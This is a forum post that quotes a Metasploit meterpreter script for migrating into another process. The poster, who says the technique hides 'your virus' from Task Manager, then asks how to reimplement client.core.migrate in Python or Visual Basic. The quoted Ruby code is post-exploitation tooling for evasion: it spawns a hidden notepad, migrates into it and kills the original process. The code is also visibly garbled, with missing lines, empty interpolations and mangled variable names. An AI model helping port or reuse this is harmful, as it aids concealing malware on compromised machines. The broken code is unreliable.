Forum Thread: Meterpreter Migrate Help Pls

# WARNING: **sploit no longer maintains or accepts meterpreter scripts.
# If you'd like to imporve this script, please try to port it as a post
# module instead. Thank you.

# Simple example script that migrates to a specific process by name.
# This is meant as an illustration.

spawn = false
kill = false
target_pid = nil
target_name = nil

opts =
"-h" => false, "Help menu." ,
"-f" => false, "Launch a process and migrate into the new process",
"-p" => true , "PID to migrate to.",
"-k" => false, "Kill original process.",
"-n" => true, "Migrate into the first process with this executable name (explorer.exe)"

opts.parse(args) { |opt, idx, val|
case opt
when "-f"
spawn = true
when "-k"
kill = true
when "-p"
targetpid = val.toi
when "-n"
targetname = val.tos
when "-h"
raise Rex::Script::Completed
raise Rex::Script::Completed

# Creates a temp notepad.exe to migrate to depending the architecture.
def createtempproc()
# Use the system path for executable to run
cmd = "notepad.exe"
# run hidden
proc = client.sys.process.execute(cmd, nil, {'Hidden' => true })

# In case no option is provided show help
if args.length == 0
raise Rex::Script::Completed

### Main ###

if client.platform == 'windows'
server =
original_pid =
print_status("Current server process: #{} (#{})")

if spawn
print_status("Spawning notepad.exe process to migrate to")
targetpid = createtemp_proc

if targetname and not targetpid
target_pid = client.sys.processtarget_name
if not target_pid
printstatus("Could not identify the process ID for #{targetname}")
raise Rex::Script::Completed

printgood("Migrating to #{targetpid}")
print_good("Successfully migrated to process #{}")
rescue ::Exception => e
print_error("Could not migrate in to process.")

if kill
printstatus("Killing original process with PID #{originalpid}")
printgood("Successfully killed process with PID #{originalpid}")

— Metasploit

Langugage = RUBY

Friends The code you see above is a code taken from metasploit in Linux. Most of Metasploit Users Know When you take Payload to the other side and listen to it, you can hide your virus from places like Task Manager with "migrate" command or you can show it like another program.

I've studied these codes, and actually it's an easy code with 96 lines. Of all the 96 lines of code, only 1 line does the actual job.


in the above code there is a variable named "target_pid" and this is the value of the program "PID" we want to hide. So far I have no problem with the main responsibility of how to do this in visual basic or python. what is actually client.core.migrate? In python or visual basic How do I use it?

Sorry My English may be bad.

Be the First to Respond

Share Your Thoughts

  • Hot
  • Active